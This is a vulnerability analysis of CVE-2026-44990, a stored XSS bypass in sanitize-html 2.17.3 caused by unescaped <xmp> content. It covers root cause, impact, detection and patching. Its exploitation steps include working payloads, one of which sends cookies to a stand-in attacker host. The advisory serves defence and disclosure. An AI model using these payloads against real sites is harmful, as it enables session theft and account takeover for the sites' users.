CVE-2026-44990: 
JavaScript Analyse et atténuation des vulnérabilités

CVE-2026-44990 is a stored Cross-Site Scripting (XSS) vulnerability in the sanitize-html npm package (bundled with ApostropheCMS) caused by improper handling of the <xmp> raw-text element under the default configuration. An unauthenticated remote attacker who can submit HTML content can smuggle arbitrary <script> tags or event-handler payloads through the sanitizer, which then execute in victims' browsers when the stored content is rendered. The vulnerability affects sanitize-html version 2.17.3 (the specific version where the flaw was introduced) and is patched in version 2.17.4. It carries a CVSS v3.1 base score of 9.3 (Critical) (GitHub Advisory). The advisory was published on May 13, 2026, and added to the GitHub Advisory Database on May 14, 2026 (GitHub Advisory).

The root cause (CWE-79) lies in how sanitize-html@2.17.3 handles the <xmp> HTML element, which htmlparser2 treats as a raw-text element — meaning its inner content is parsed as plain text on input. The default nonTextTags list in index.js (lines 138–142) includes only script, style, textarea, and option, omitting xmp. As a result, when xmp is disallowed (the default), the ontext handler at lines 569–577 special-cases xmp and appends its text content directly to the sanitized output without HTML escaping (result += text). Because the inner markup was parsed as text by htmlparser2 but is re-emitted as raw HTML, a payload like <xmp><script>alert(1)</script> passes through sanitization and becomes live JavaScript when inserted into the DOM (GitHub Advisory, Patch Commit). No authentication or special privileges are required; the attacker only needs the ability to submit HTML content to an application using the default disallowedTagsMode: 'discard' configuration.

Successful exploitation enables stored XSS, allowing a remote attacker to inject and persistently execute arbitrary JavaScript in the browsers of any user who views the affected content. This can lead to session token theft, credential harvesting, account takeover, defacement, and further client-side attacks such as redirecting users to malicious sites. The CVSS scope is marked as "Changed," reflecting that the impact extends beyond the vulnerable component to the users' browser environments, with high confidentiality and integrity impact (GitHub Advisory).

1. Identify a target application: Find a web application that uses sanitize-html version 2.17.3 (e.g., ApostropheCMS instances) with the default disallowedTagsMode: 'discard' configuration and renders sanitized HTML output back to users.
2. Craft the payload: Construct an HTML payload that wraps malicious markup inside an <xmp> element, such as <xmp><script>alert(document.cookie)</script> or <xmp><img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>.
3. Submit the payload: Submit the crafted payload through any user-controlled HTML input field (e.g., a comment box, rich-text editor, or profile field) that passes content through sanitize-html before storage.
4. Sanitizer bypass occurs: The sanitize-html library parses the <xmp> content as raw text (via htmlparser2) and re-emits it unescaped into the sanitized output, stripping the <xmp> wrapper but leaving the inner <script> or event-handler markup as live HTML.
5. Trigger execution: When another user (e.g., an administrator or victim) views the page containing the stored content, the browser interprets the unescaped markup as live HTML/JavaScript, executing the attacker's payload and potentially exfiltrating session cookies or performing actions on behalf of the victim (GitHub Advisory, Patch Commit).

• Network: Outbound HTTP requests from victim browsers to unexpected external domains (e.g., attacker-controlled servers) immediately after viewing user-generated content pages; unusual fetch or XMLHttpRequest calls visible in browser developer tools or proxy logs.
• Logs: Application or web server access logs showing submissions of HTML content containing <xmp> tags to input endpoints; stored database entries containing raw <script> tags or event-handler attributes (e.g., onerror=, onload=) in fields that should contain sanitized HTML.
• File System: If the application stores sanitized HTML to disk or a cache, presence of unescaped <script> blocks or inline event handlers in stored HTML files or cache entries.
• Process/Application Behavior: Unexpected JavaScript execution errors or alerts reported by users viewing content pages; Content Security Policy (CSP) violation reports referencing inline scripts in pages that render user-generated content (GitHub Advisory).

The primary remediation is to update sanitize-html to version 2.17.4, which adds xmp to the default nonTextTags list so its contents are dropped entirely when the tag is disallowed (Patch Commit, GitHub Advisory). As an interim workaround, explicitly add xmp to the nonTextTags option in your sanitize-html configuration: nonTextTags: ['style', 'script', 'textarea', 'option', 'xmp']. Additionally, apply output encoding when rendering sanitized HTML as a defense-in-depth measure, and consider deploying a strict Content Security Policy (CSP) to limit the impact of any XSS bypass.

The vulnerability was reported by security researcher Vincenzo Turturro (GitHub: sushi-gif) and published by ApostropheCMS maintainer boutell on May 13, 2026 (GitHub Advisory). A community issue was opened shortly after to clarify whether the vulnerability was introduced specifically in version 2.17.3 or affected all versions ≤ 2.17.3, reflecting some ambiguity in the initial advisory scope (apostrophecms/apostrophe#5418). The patch commit message explicitly urges all users of sanitize-html to update immediately (Patch Commit).